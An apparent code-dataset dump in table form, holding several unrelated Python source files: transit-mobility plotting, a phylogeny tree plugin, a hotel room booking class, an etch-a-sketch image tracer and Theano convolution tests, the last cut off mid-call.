max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
NGram/prediction_2104/user_exploration.py | mbc96325/IOHMM-for-individual-mobility-prediction | 1 | 12786251 | import math
import numpy as np
import oyster_reader as oyster
from matplotlib import pyplot as plt
import matplotlib.colors as cl
# import seaborn as sns
def plotInterTripTime(users):
count = 0
dtFreq = np.zeros(60 * 20)
for u in users:
interTripTime = u.getInterTripTime()
for dt in interTripTime:
dtFreq[dt] += 1
count += 1
dtProb = dtFreq * 1.0 / count
plt.figure()
plt.plot(dtProb)
plt.xlim(0, 18)
xticks = [60 * i for i in range(19)]
xlabels = range(19)
plt.xticks(xticks, xlabels)
plt.xlabel("Inter-Trip Time (in hours)")
plt.ylabel("Probability")
plt.show()
def plotInterTripTimeByOrder(users):
count = 0
tFreq = np.zeros((4, 60 * 20))
for u in users:
dailyDict = u.getDailyTrips()
for day, trips in dailyDict.iteritems():
num_trips = len(trips)
for i in range(1, num_trips):
dt = trips[i].getTime() - trips[i - 1].getTime()
order = min(i - 1, 3)
tFreq[order, dt] += 1.0
count += 1
tProb = tFreq / count
colors = ['r', 'b', 'g', 'c', 'm', 'y', 'k', 'w']
labels = ['1', '2', '3', '4', '5+']
plt.figure(figsize=(14, 7))
for i in xrange(1, 5):
plt.plot(tProb[i - 1, :], colors[i] + '-', label=labels[i])
plt.xlim(0, 18)
xticks = [60 * i for i in range(19)]
xlabels = range(19)
plt.xticks(xticks, xlabels)
plt.xlabel("Inter-Trip Time (in hours)")
plt.ylabel("Probability")
plt.legend(loc='upper right')
plt.show()
def plotTripTime(users):
count = 0
tFreq = np.zeros(60 * 27)
for u in users:
tripTime = u.getTripTime()
for dt in tripTime:
tFreq[dt] += 1
count += 1
tProb = tFreq * 1.0 / count
plt.figure()
plt.plot(tProb)
plt.xlim(3, 27)
xticks = [60 * i for i in range(3, 28)]
xlabels = range(3, 28)
plt.xticks(xticks, xlabels)
plt.xlabel("Time of Day")
plt.ylabel("Probability")
plt.show()
def plotTripTimeByOrder(users):
count = 0
tFreq = np.zeros((5, 60 * 27))
for u in users:
dailyDict = u.getDailyTrips()
for day, trips in dailyDict.iteritems():
num_trips = len(trips)
for i in range(0, num_trips):
order = min(i, 4)
tFreq[order, trips[i].getTime()] += 1.0
count += 1
tProb = tFreq / count
colors = ['r', 'b', 'g', 'c', 'm', 'y', 'k', 'w']
labels = ['1', '2', '3', '4', '5+']
plt.figure(figsize=(14, 7))
for i in xrange(5):
plt.plot(tProb[i, :], colors[i] + '-', label=labels[i])
plt.xlim(3, 27)
xticks = [60 * i for i in range(3, 28)]
xlabels = range(3, 28)
plt.xticks(xticks, xlabels)
plt.xlabel("Time of Day")
plt.ylabel("Probability")
plt.legend(loc='upper left')
plt.show()
def plotNumStations(users):
stNum = []
odNum = []
for u in users:
stNum.append(len(u.getStationFreq()))
odNum.append(len(u.getStationFreq(stationType='od')))
plt.figure(figsize=(14, 7))
plt.subplot(121)
plt.hist(stNum, bins=np.linspace(0, 120, 10))
plt.xlim(0, 120)
plt.xlabel('Number of Stations')
plt.ylabel('Frequency')
plt.subplot(122)
plt.plot(stNum, odNum, 'o')
plt.xlabel('Number of Stations')
plt.ylabel('Number of OD Pairs')
plt.show()
def plotStationUsage(users):
n = 20
ranks = range(n + 1)
oRank = []
dRank = []
for user in users:
total = len(user.tripList)
rankedOs = user.getStationRank(stationType='in')
shares = [item[1] * 1.0 / total for item in rankedOs[:n]]
shares = [0] + shares
if len(shares) < (n + 1):
shares = shares + [0] * (n + 1 - len(shares))
dbn = np.cumsum(shares)
oRank.append(dbn)
rankedDs = user.getStationRank(stationType='out')
shares = [item[1] * 1.0 / total for item in rankedDs[:n]]
shares = [0] + shares
if len(shares) < (n + 1):
shares = shares + [0] * (n + 1 - len(shares))
dbn = np.cumsum(shares)
dRank.append(dbn)
plt.figure(figsize=(10, 8))
YO = np.median(np.array(oRank), axis=0)
YD = np.median(np.array(dRank), axis=0)
plt.plot(ranks, YO, c='blue', marker='o', ls='-', label='Entry Station')
plt.plot(ranks, YD, c='red', marker='^', ls='--', label='Exit Station')
plt.xlabel('Top-K Most Used Station', fontsize=16)
plt.ylabel('Proportion (Median)', fontsize=16)
plt.legend(loc='lower right', fontsize=14)
plt.grid()
plt.show()
def mostUsedStations(users):
inProb = []
outProb = []
for u in users:
nDays = u.getActiveDays()
mus = u.getStationRank()[0][0]
inCount = 0
outCount = 0
dailyDict = u.getDailyTrips()
for day, trips in dailyDict.iteritems():
if trips[0].inStation == mus:
inCount += 1
if trips[-1].outStation == mus:
outCount += 1
inProb.append(inCount * 1.0 / nDays)
outProb.append(outCount * 1.0 / nDays)
print np.median(inProb)
print np.median(outProb)
def entropy(X):
ent = 0
N = len(X)
labels = set(X)
for label in labels:
prob = float(X.count(label)) / N
if prob > 0:
ent -= prob * math.log(prob, 2)
return ent
def gridPlot(users):
stNum = []
n = 20
ranks = range(n + 1)
oRank = []
dRank = []
count = 0
tFreq = np.zeros(2 * 27)
oEnt = []
dEnt = []
tEnt = []
for u in users:
stNum.append(len(set(u.getStationFreq())))
total = len(u.tripList)
rankedOs = u.getStationRank(stationType='in')
oShares = [item[1] * 1.0 / total for item in rankedOs[:n]]
if len(oShares) < n:
oShares = oShares + [0] * (n - len(oShares))
oRank.append(oShares)
rankedDs = u.getStationRank(stationType='out')
dShares = [item[1] * 1.0 / total for item in rankedDs[:n]]
if len(dShares) < n:
dShares = dShares + [0] * (n - len(dShares))
dRank.append(dShares)
tripTime = u.getDiscreteTripTime()
for dt in tripTime:
tFreq[dt] += 1
count += 1
oEnt.append(entropy(u.getStationList(stationType='in')))
dEnt.append(entropy(u.getStationList(stationType='out')))
tEnt.append(entropy(u.getDiscreteTripTime()))
plt.figure(figsize=(14, 14))
ax1 = plt.subplot(221)
plt.hist(stNum, bins=np.linspace(0, 120, 10))
plt.xlim(0, 120)
plt.xlabel('Number of Stations (used in a Year)')
plt.ylabel('Frequency')
plt.text(-0.15, 1, '(a)', fontdict={'size': 16, 'weight': 'bold'},
transform=ax1.transAxes)
ax2 = plt.subplot(222)
YO = np.median(np.array(oRank), axis=0)
YD = np.median(np.array(dRank), axis=0)
plt.plot(ranks[1:], YO, c='blue', marker='o', ls='-', label='Entry Station')
plt.plot(ranks[1:], YD, c='red', marker='^', ls='--', label='Exit Station')
plt.xlabel('The K-th Most Used Station')
plt.ylabel('Proportion (Median)')
plt.legend(loc='upper right', fontsize=12)
plt.text(-0.15, 1, '(b)', fontdict={'size': 16, 'weight': 'bold'},
transform=ax2.transAxes)
ax3 = plt.subplot(223)
tProb = tFreq * 1.0 / count
plt.plot(tProb, 'k-')
plt.xlim(3 * 2, 26 * 2)
xticks = [i for i in range(3 * 2, 26 * 2, 2)]
xlabels = range(3, 26)
plt.xticks(xticks, xlabels)
plt.xlabel("Hour of Day")
plt.ylabel("Probability")
plt.text(-0.15, 1, '(c)', fontdict={'size': 16, 'weight': 'bold'},
transform=ax3.transAxes)
ax4 = plt.subplot(224)
left = range(1, 4)
height = [np.median(tEnt), np.median(oEnt), np.median(dEnt)]
plt.bar(left, height, align='center', color=['k', 'b', 'r'])
xticks = range(1, 4)
xlabels = ['Time', 'Entry Station', 'Exit Station']
plt.xticks(xticks, xlabels)
plt.ylabel("Entropy")
plt.text(-0.15, 1, '(d)', fontdict={'size': 16, 'weight': 'bold'},
transform=ax4.transAxes)
plt.show()
def plotTripRate(users):
userDays = 0
trips = 0
tRate = []
for u in users:
total = len(u.tripList)
days = u.getActiveDays()
tRate.append(total * 1.0 / days)
userDays += days
trips += total
print userDays, trips
plt.hist(tRate)
plt.show()
def plotActiveDays(users):
sortedUsers = sorted(users, key=lambda t: t.getActiveDays(), reverse=True)
vector = np.array([u.getActiveDayVector() for u in sortedUsers])
fig, ax = plt.subplots(figsize=(9, 3))
norm = cl.Normalize(vmin=0, vmax=1)
im = ax.imshow(vector.T, interpolation='nearest', cmap='hot')
# ax.set_aspect(1. / ax.get_data_ratio())
ax.set_xlabel('User')
ax.set_ylabel('Day')
plt.show()
def plotInterActiveDays(users):
activeD = []
deltaD = []
for u in users:
activeD.append(u.getActiveDays())
deltaD.extend(u.getInterActiveDays())
fig, axes = plt.subplots(figsize=(10, 5))
plt.subplot(121)
plt.hist(activeD, bins=range(60, 361, 15), normed=True)
plt.xlabel('Number of Active Days')
plt.ylabel('Probability (User)')
plt.subplot(122)
plt.hist(np.array(deltaD) - 1, bins=range(0, 20, 1), normed=True)
plt.xlabel('Number of Days between Active Days')
plt.ylabel('Probability (User Day)')
plt.show()
if __name__ == "__main__":
dataFile = "/Volumes/MobilitySyntax/data/sampleData_2013_reduced.csv"
vocabFile = "/Volumes/MobilitySyntax/data/station_vocab.csv"
users = oyster.readPanelData(dataFile, vocabFile)
users = [u for u in users if u.getActiveDays > 60]
# plotNumStations(users)
# plotInterTripTimeByOrder(users)
# plotTripTimeByOrder(users)
# plotStationUsage(users)
# mostUsedStations(users)
# gridPlot(users)
# plotTripRate(users)
# plotActiveDays(users)
plotInterActiveDays(users)
| 2.703125 | 3 |
src/clld_phylogeny_plugin/tree.py | clld/clld-phylogeny-plugin | 1 | 12786252 | <reponame>clld/clld-phylogeny-plugin<gh_stars>1-10
import operator
import itertools
import collections
from zope.interface import implementer
from sqlalchemy.orm import joinedload
from clldutils.misc import lazyproperty
from clld.db.meta import DBSession
from clld.db.models.common import Parameter, ValueSet
from clld.web.util.component import Component
from clld.web.util.htmllib import HTML
from clld.web.util.helpers import link, map_marker_img
import ete3
from ete3.coretype.tree import TreeError
from clld_phylogeny_plugin.interfaces import ITree
def all_equal(iterator, op=operator.eq):
iterator = iter(iterator)
try:
first = next(iterator)
except StopIteration:
return True
return all(op(first, rest) for rest in iterator)
@implementer(ITree)
class Tree(Component):
"""Represents the configuration for a leaflet map."""
__template__ = 'clld_phylogeny_plugin:templates/tree.mako'
def __init__(self, ctx, req, eid='tree'):
"""Initialize.
:param ctx: context object of the current request.
:param req: current pyramid request object.
:param eid: Page-unique DOM-node ID.
"""
self.req = req
self.ctx = ctx
self.eid = eid
@lazyproperty
def parameters(self):
pids = []
if 'parameter' in self.req.params:
pids = self.req.params.getall('parameter')
elif 'parameters' in self.req.params:
pids = self.req.params['parameters'].split(',')
if pids:
return DBSession.query(Parameter)\
.filter(Parameter.id.in_(pids))\
.options(
joinedload(Parameter.valuesets).joinedload(ValueSet.values),
joinedload(Parameter.domain))\
.all()
return []
@lazyproperty
def domains(self):
return [
collections.OrderedDict([(de.pk, de) for de in p.domain])
for p in self.parameters]
@lazyproperty
def newick(self):
if self.parameters:
t = ete3.Tree(self.ctx.newick, format=1)
nodes = set(n for n in self.labelSpec.keys())
try:
t.prune(
nodes.intersection(set(n.name for n in t.traverse())),
preserve_branch_length=True)
except TreeError:
return
return t.write(format=1)
return self.ctx.newick
def get_label_properties(self, label, pindex=None):
res = {
'eid': 'tlpk{0}-{1}'.format(label, pindex),
'shape': 'c',
'color': '#ff6600',
'conflict': False,
'tooltip_title': 'Related {0}'.format(self.req.translate('Languages')),
}
if pindex is not None:
parameter = self.parameters[pindex]
domain = self.domains[pindex]
language2valueset = {
k: v[pindex] for k, v in self.language2valueset.items() if v[pindex]}
def vname(v):
return domain[v.domainelement_pk].name if v.domainelement_pk else v.name
def comp(a, b):
if parameter.domain:
return a.domainelement_pk == b.domainelement_pk
return a.name == b.name
values = list(itertools.chain(*[
language2valueset[l.pk].values for l in label.languages
if l.pk in language2valueset]))
if not values:
res['tooltip_title'] = 'Missing data'
res['tooltip'] = None
res['shape'] = 's'
res['color'] = '#fff'
else:
res['conflict'] = not all_equal(values, op=comp)
if not res['conflict']:
res['tooltip_title'] = '{0}: {1}'.format(
values[0].valueset.parameter.id, vname(values[0]))
lis = [
HTML.li(link(self.req, l)) for l in label.languages
if l.pk in language2valueset]
else:
res['tooltip_title'] = '{0}'.format(values[0].valueset.parameter.id)
lis = []
for v in values:
lis.append(HTML.li(
map_marker_img(
self.req, domain[v.domainelement_pk]
if v.domainelement_pk else v),
'{0}: '.format(vname(v)),
link(self.req, v.valueset.language)))
res['tooltip'] = HTML.ul(*lis, class_='unstyled')
for lang in label.languages:
if lang.pk in language2valueset:
res['shape'], res['color'] = self.get_marker(
language2valueset[lang.pk])
break
else:
res['tooltip'] = HTML.ul(
*[HTML.li(link(self.req, l)) for l in label.languages])
return res
@staticmethod
def head(req):
return '\n'.join(
"{0}".format(e) for e in [
HTML.link(
rel="stylesheet",
href=req.static_url('clld_phylogeny_plugin:static/phylotree.css')),
HTML.script(
src="https://d3js.org/d3.v3.min.js"),
HTML.script(
src="https://cdnjs.cloudflare.com/ajax/libs/underscore.js/1.8.3/"
"underscore-min.js",
charset="utf-8"),
HTML.script(
type="text/javascript",
src=req.static_url('clld_phylogeny_plugin:static/phylotree.js')),
HTML.script(
type="text/javascript",
src=req.static_url(
'clld_phylogeny_plugin:static/clld_phylogeny_plugin.js')),
])
@lazyproperty
def language2valueset(self):
if self.parameters:
res = collections.defaultdict(lambda: [None] * len(self.parameters))
for i, param in enumerate(self.parameters):
for vs in param.valuesets:
res[vs.language_pk][i] = vs
return res
@lazyproperty
def labelSpec(self):
if self.parameters:
return {
l.name: [self.get_label_properties(l, i)
for i in range(len(self.parameters))]
for l in self.ctx.treelabels
if any(lang.pk in self.language2valueset for lang in l.languages)}
return {
l.name: [self.get_label_properties(l)]
for l in self.ctx.treelabels if l.languages}
def get_default_options(self):
return {
'reroot': False,
'brush': False,
'align-tips': True,
'show-scale': False
}
def get_marker(self, valueset):
if valueset.values:
val = valueset.values[0]
if val.domainelement and val.domainelement.jsondatadict.get('icon'):
icon = val.domainelement.jsondatadict.get('icon')
return icon[:1], '#' + icon[1:]
return 'c', '#ff6600'
| 2.21875 | 2 |
nari/types/event/addcombatant.py | lunarrize/nari | 9 | 12786253 | <gh_stars>1-10
"""Event representing an actor being added to the field"""
from nari.types.event.base import Event
from nari.types.event import Type
from nari.types.actor import Actor
class AddCombatant(Event):
"""Adding an actor to the field"""
__id__ = Type.addcombatant.value
def handle_params(self):
self.actor = Actor(self.params[0], self.params[1])
def __repr__(self):
return f'<AddCombatant ({self.actor})>'
| 2.34375 | 2 |
room.py | benjy8/Hotel-booking | 0 | 12786254 | import datetime
'''
room.py
'''
# declare constants
MONTHS = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']
DAYS_PER_MONTH = [31,28,31,30,31,30,31,31,30,31,30,31]
#class Room
class Room:
#class attributes
TYPES_OF_ROOM_AVAILABLE = ['twin','double','queen','king']
#instance attributes
def __init__(self, rType, rNum, rPricePerNight):
# check if the room is available
if rType.lower() in (rT.lower() for rT in Room.TYPES_OF_ROOM_AVAILABLE):
self.room_type = rType
else:
raise AssertionError("Room type not available")
# check if the room number is positive
if rNum > 0:
self.room_num = rNum
else:
raise AssertionError("Room number should be positive")
# check if the room price is positive
if rPricePerNight > 0:
self.price = rPricePerNight
else:
raise AssertionError("Price should be positive")
# initialize the empty dictionary
self.availability = {}
# string representation of room
def __str__(self):
return "Room " +str(self.room_num) + "," +self.room_type +"," +str(self.price)
'''
:param input list of string representing months
:param an integer representing the year
updates the availability of room
'''
def set_up_room_availability(self, monthList, yearInt):
isleap = False
if (yearInt % 4) == 0:
if (yearInt % 100) == 0:
if (yearInt % 400) == 0:
isleap = True
else:
isleap = False
else: # if the year is divisible 400
isleap = True
else:
isleap = False
# loop through all the given months
for month in monthList:
# find the index of month in the MONTHS array
monthIndex = MONTHS.index(month)
# create tuple of integers
monthTuple = (yearInt, monthIndex+1)
# create a empty list to hold booleans
days = []
# first element is None
days.append(None)
numDays = DAYS_PER_MONTH[monthIndex]
# if year is leap year, feb should have 29 days
if monthIndex == 1 and isleap:
numDays = 29
# loop through the number of days
for day in range(numDays):
days.append(True)
# update the availability dictionary
self.availability[monthTuple] = days
def reserve_room(self, reserveDate):
if not self.availability[(reserveDate.year, reserveDate.month)][reserveDate.day]:
raise AssertionError("The room is not available at the given date")
self.availability[(reserveDate.year, reserveDate.month)][reserveDate.day] = False
def make_available(self, reserveDate):
self.availability[(reserveDate.year, reserveDate.month)][reserveDate.day] = True
def is_available(self, checkIn, checkOut):
if checkIn > checkOut:
raise AssertionError("Check-out date is earlier than check-ins")
for year in range(checkIn.year, checkOut.year+1):
if checkIn.month <= checkOut.month:
for month in range(checkIn.month, checkOut.month+1):
for day in range(1, DAYS_PER_MONTH[month-1]):
if month == checkIn.month and day >= checkIn.day and not self.availability[(year,month)][day]:
return False
if month == checkOut.month and day < checkOut.day and not self.availability[(year,month)][day]:
return False
if month != checkIn.month and month != checkOut.month and not self.availability[(year,month)][day]:
return False
else:
if year == checkIn.year:
months = list(range(checkIn.month,13))
elif year == checkOut.year:
months = list(range(1,checkOut.month+1))
else:
months = range(13)
for month in months:
for day in range(1,DAYS_PER_MONTH[month-1]):
if month == checkIn.month and day >= checkIn.day and not self.availability[(year,month)][day]:
return False
if month == checkOut.month and day < checkOut.day and not self.availability[(year,month)][day]:
return False
if month != checkIn.month and month != checkOut.month and not self.availability[(year,month)][day]:
return False
return True
@staticmethod
def find_available_room(rooms, roomType, checkIn, checkOut):
if checkIn > checkOut:
raise AssertionError("Check-out date is earlier than check-ins")
temp_rooms = [room for room in rooms if room.room_type == roomType]
for room in temp_rooms:
if room.is_available(checkIn, checkOut):
return room
return None
if __name__ == '__main__':
r = Room("Queen", 105, 80.0)
r.set_up_room_availability(['Jan', 'Dec'], 2019)
print(len(r.availability))
print(len(r.availability[(2019, 11)]))
print(r.availability[(2019, 11)][5])
| 3.609375 | 4 |
juno/onboarding.py | ASG09/juno-python | 7 | 12786255 | from juno.resources import handler_request
from juno.resources.routes import onboarding_routes
def account_new_onboarding_request(dictionary):
return handler_request.post(onboarding_routes.get_base_url(), dictionary) | 1.828125 | 2 |
python/tests/protocol1_0/image.py | wnetz/etch-a-sketch | 0 | 12786256 | import sys
import cv2
from matplotlib import pyplot as plt
from skimage.filters import sobel
import numpy as np
import math
from Etch import Etch
PRINT_ETCH = True
class Image:
def __init__(self):
self.points = []
self.image = cv2.imread("C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/tri.png", 0)
self.imageShape = 0
self.etch = Etch()
self.sourceFile = open('C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/test.txt', 'w')
self.sourceFile2 = open('C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/test2.txt', 'w')
np.set_printoptions(threshold=sys.maxsize)
def processImage(self):
self.imageShape = self.image.shape
sig = .3
median = np.median(self.image)
lower = int(max(0,(1.0-sig)*median))
upper = int(min(255,(1.0+sig)*median))
self.image = cv2.Canny(self.image,lower,upper)
plt.imshow(self.image, cmap='gray')
plt.show()
def sort(self):
#loop x
for x in range(self.imageShape[0]):
#loop y
for y in range(self.imageShape[1]):
#if there is an edge pixle
if self.image[x][y] == 255:
point = (((x -self.imageShape[1] + 1) * -1) * 18000/self.imageShape[1], y * 12000/self.imageShape[0])
self.points.append(point)
#print ("("+str(point[0]) + "," + str(point[1])+")")
print("X",end='',file = self.sourceFile)
else:
print(" ",end='',file = self.sourceFile)
print("",file = self.sourceFile)
print(len(self.points))
def drawImage(self):
avg = 0
numpoints = 0
minpoint = [0,0]
length = len(self.points)
while len(self.points) > 1:
oldmin = minpoint
min = math.pow(math.pow(18000,2) + math.pow(12000,2),.5)
minpoint = []
lessmin = []
for point in self.points:
dist = math.pow(math.pow(point[0]-oldmin[0],2) + math.pow(point[1]-oldmin[1],2),.5)
if min < dist and dist < 100:
lessmin.append(point)
if dist < min:
min = dist
minpoint = point
#if min < 3:
#break
if len(minpoint) > 0:
print(str(min) + " (" + str(minpoint[0]) + "," + str(minpoint[1]) + ")", file = self.sourceFile2)
if min > 1:
avg = avg + min
numpoints = numpoints + 1
for point in lessmin:
self.points.remove(point)
if len(minpoint) > 0:
self.points.remove(minpoint)
self.etch.goto(minpoint[0],minpoint[1],PRINT_ETCH)
if len(self.points) % 1000 == 0:
print(len(self.points))
print(str(min) + " (" + str(minpoint) + ") ",len(self.points))
print("total " + str(avg) + " " + str(numpoints))
print("total " + str(avg/numpoints))
def end(self):
self.sourceFile.close()
self.sourceFile2.close()
self.etch.goto(0,0,PRINT_ETCH)
image = Image()
#print("enter image path")
#print(input())
image.processImage()
image.sort()
image.drawImage()
image.end()
| 2.828125 | 3 |
microPython/lib/microCoAPy/reading.py | renzoe/IANVS | 2 | 12786257 | <filename>microPython/lib/microCoAPy/reading.py<gh_stars>1-10
class Reading:
# Period is the index in the array
def __init__(self, attack):
self.attack = attack | 2.375 | 2 |
theano/sandbox/cuda/tests/test_abstractconv.py | aalmah/Theano | 0 | 12786258 | <filename>theano/sandbox/cuda/tests/test_abstractconv.py<gh_stars>0
import unittest
import numpy
import itertools
import theano
from theano.tests import unittest_tools as utt
import theano.tensor.nnet.abstract_conv2d as conv
from theano.sandbox.cuda import float32_shared_constructor as gpu_shared
from theano.compile import shared as cpu_shared
from theano.sandbox.cuda.dnn import dnn_available, dnn_conv, dnn_gradweight, dnn_gradinput
from nose.plugins.skip import SkipTest
import theano.sandbox.cuda as cuda
if not cuda.cuda_available:
raise SkipTest('Optional package cuda disabled')
if theano.config.mode == 'FAST_COMPILE':
mode_with_gpu = theano.compile.mode.get_mode('FAST_RUN').including('gpu')
mode_without_gpu = theano.compile.mode.get_mode('FAST_RUN').excluding('gpu')
else:
mode_with_gpu = theano.compile.mode.get_default_mode().including('gpu')
mode_without_gpu = theano.compile.get_default_mode().excluding('gpu')
class TestConv2d(unittest.TestCase):
def setUp(self):
super(TestConv2d, self).setUp()
self.inputs_shapes = [(8, 1, 12, 12), (8, 1, 18, 18), (2, 1, 4, 4),
(6, 1, 10, 11), (2, 1, 6, 5), (1, 5, 9, 9)]
self.filters_shapes = [(5, 1, 2, 2), (4, 1, 3, 3), (2, 1, 3, 3),
(1, 1, 2, 5), (4, 1, 2, 2), (4, 5, 2, 2)]
self.subsamples = [(1, 1), (2, 2), (2, 4)]
self.border_modes = ["valid", "full", (0, 0), (1, 1), (5, 5), (5, 2)]
self.filter_flip = [True, False]
def get_output_shape(self, inputs_shape, filters_shape, subsample, border_mode):
if border_mode == "valid":
border_mode = (0, 0)
if border_mode == "full":
border_mode = (filters_shape[2] - 1, filters_shape[3] - 1)
batch_size = inputs_shape[0]
num_filters = filters_shape[0]
return (batch_size, num_filters,) \
+ tuple(None if i is None or k is None
else ((i + 2 * pad - k) // d + 1)
for i, k, d, pad in zip(inputs_shape[2:], filters_shape[2:],
subsample, border_mode))
def run_fwd(self, inputs_shape, filters_shape, ref=dnn_conv,
subsample=(1, 1), verify_grad=True, mode=mode_without_gpu,
border_mode='valid', filter_flip=True, device='cpu', provide_shape=False):
inputs_val = numpy.random.random(inputs_shape).astype('float32')
filters_val = numpy.random.random(filters_shape).astype('float32')
if device == 'gpu':
inputs = gpu_shared(inputs_val)
filters = gpu_shared(filters_val)
else:
inputs = theano.tensor.as_tensor_variable(cpu_shared(inputs_val))
filters = theano.tensor.as_tensor_variable(cpu_shared(filters_val))
if provide_shape:
imshp = inputs_shape
kshp = filters_shape
else:
imshp = None
kshp = None
if filter_flip:
conv_mode = 'conv'
else:
conv_mode = 'cross'
c_ref = ref(inputs, filters,
border_mode=border_mode,
subsample=subsample,
conv_mode=conv_mode)
c = conv.conv2d(inputs, filters,
border_mode=border_mode,
subsample=subsample,
filter_flip=filter_flip,
input_shape=imshp,
filter_shape=kshp)
f_ref = theano.function([], c_ref, mode=mode)
f = theano.function([], c, mode)
res_ref = numpy.array(f_ref())
res = numpy.array(f())
utt.assert_allclose(res_ref, res)
if verify_grad:
utt.verify_grad(conv.AbstractConv2d(border_mode="valid", imshp=imshp, kshp=kshp,
subsample=subsample),
[inputs_val, filters_val],
mode=mode)
def run_gradweight(self, inputs_shape, filters_shape, output_shape,
ref=dnn_gradweight, subsample=(1, 1), filter_flip=True,
verify_grad=True, mode=mode_without_gpu, border_mode='valid',
device='cpu', provide_shape=False):
inputs_val = numpy.random.random(inputs_shape).astype('float32')
output_val = numpy.random.random(output_shape).astype('float32')
if device == 'gpu':
inputs = gpu_shared(inputs_val)
output = gpu_shared(output_val)
else:
inputs = theano.tensor.as_tensor_variable(cpu_shared(inputs_val))
output = theano.tensor.as_tensor_variable(cpu_shared(output_val))
if provide_shape:
imshp = inputs_shape
kshp = filters_shape
else:
imshp = None
kshp = None
if filter_flip:
conv_mode = 'conv'
else:
conv_mode = 'cross'
c = conv.AbstractConv2d_gradWeights(border_mode=border_mode,
filter_flip=filter_flip,
subsample=subsample,
imshp=imshp, kshp=kshp)
c = c(inputs, output, filters_shape[-2:])
c_ref = ref(inputs, output,
filters_shape,
border_mode=border_mode,
subsample=subsample,
conv_mode=conv_mode)
f = theano.function([], c, mode)
f_ref = theano.function([], c_ref, mode)
res_ref = numpy.array(f_ref())
res = numpy.array(f())
utt.assert_allclose(res_ref, res)
def abstract_conv2d_gradweight(inputs_val, output_val):
conv_op = conv.AbstractConv2d_gradWeights(border_mode=border_mode, subsample=subsample)
return conv_op(inputs_val, output_val, filters_shape[-2:])
if verify_grad:
utt.verify_grad(abstract_conv2d_gradweight, [inputs_val, output_val],
mode=mode, eps=1)
def run_gradinput(self, inputs_shape, filters_shape, output_shape, ref=dnn_gradinput,
subsample=(1, 1), filter_flip=True, verify_grad=True, mode=mode_without_gpu,
border_mode='valid', device='cpu', provide_shape=False):
output_val = numpy.random.random(output_shape).astype('float32')
filters_val = numpy.random.random(filters_shape).astype('float32')
if device == 'gpu':
output = gpu_shared(output_val)
filters = gpu_shared(filters_val)
else:
output = theano.tensor.as_tensor_variable(cpu_shared(output_val))
filters = theano.tensor.as_tensor_variable(cpu_shared(filters_val))
if provide_shape:
imshp = inputs_shape
kshp = filters_shape
else:
imshp = None
kshp = None
if filter_flip:
conv_mode = 'conv'
else:
conv_mode = 'cross'
c = conv.AbstractConv2d_gradInputs(border_mode=border_mode,
subsample=subsample,
filter_flip=filter_flip,
imshp=imshp, kshp=kshp)
c = c(filters, output, inputs_shape[-2:])
c_ref = ref(filters, output, inputs_shape,
border_mode=border_mode, subsample=subsample,
conv_mode=conv_mode)
f = theano.function([], c, mode)
f_ref = theano.function([], c_ref, mode)
res_ref = numpy.array(f_ref())
res = numpy.array(f())
utt.assert_allclose(res_ref, res)
def abstract_conv2d_gradinputs(filters_val, output_val):
conv_op = conv.AbstractConv2d_gradInputs(border_mode=border_mode, subsample=subsample)
return conv_op(filters_val, output_val, inputs_shape[-2:])
if verify_grad:
utt.verify_grad(abstract_conv2d_gradinputs, [filters_val, output_val],
mode=mode, eps=1)
def test_dnn_conv(self):
if not dnn_available():
raise SkipTest(cuda.dnn.dnn_available.msg)
mode = mode_with_gpu
# provide_shape is not used by the CuDNN impementation
provide_shape = False
for (i, f), s, b, flip in itertools.product(
zip(self.inputs_shapes, self.filters_shapes),
self.subsamples,
self.border_modes,
self.filter_flip):
o = self.get_output_shape(i, f, s, b)
self.run_fwd(inputs_shape=i, filters_shape=f, subsample=s,
verify_grad=True, mode=mode, device='gpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
self.run_gradweight(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode, device='gpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
self.run_gradinput(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode, device='gpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
def test_cormm_conv(self):
if not dnn_available():
raise SkipTest(cuda.dnn.dnn_available.msg)
mode = mode_with_gpu.excluding('cudnn')
for (i, f), s, b, flip, provide_shape in itertools.product(
zip(self.inputs_shapes, self.filters_shapes),
self.subsamples,
self.border_modes,
self.filter_flip,
[False, True]):
o = self.get_output_shape(i, f, s, b)
self.run_fwd(inputs_shape=i, filters_shape=f, subsample=s,
verify_grad=True, mode=mode, device='gpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
self.run_gradweight(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode, device='gpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
self.run_gradinput(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode, device='gpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
def test_cpu_conv(self):
if not dnn_available():
raise SkipTest(cuda.dnn.dnn_available.msg)
mode = mode_without_gpu
for (i, f), s, b, flip, provide_shape in itertools.product(
zip(self.inputs_shapes, self.filters_shapes),
self.subsamples,
self.border_modes,
self.filter_flip,
[False, True]):
o = self.get_output_shape(i, f, s, b)
fwd_OK = True
gradweight_OK = True
gradinput_OK = True
if not flip:
fwd_OK = False
gradweight_OK = False
gradinput_OK = False
if b not in ('valid', 'full'):
fwd_OK = False
gradweight_OK = False
gradinput_OK = False
if (not provide_shape) and (s != (1, 1)) and (b == 'full'):
gradweight_OK = False
gradinput_OK = False
if ((s[0] not in (1, 2)) or (s[1] not in (1, 2))) and (b == 'full'):
gradweight_OK = False
gradinput_OK = False
if fwd_OK:
self.run_fwd(inputs_shape=i, filters_shape=f, subsample=s,
verify_grad=True, mode=mode, device='cpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
else:
self.assertRaises(NotImplementedError,
self.run_fwd,
inputs_shape=i,
filters_shape=f,
subsample=s,
verify_grad=False,
mode=mode,
device='cpu',
provide_shape=provide_shape,
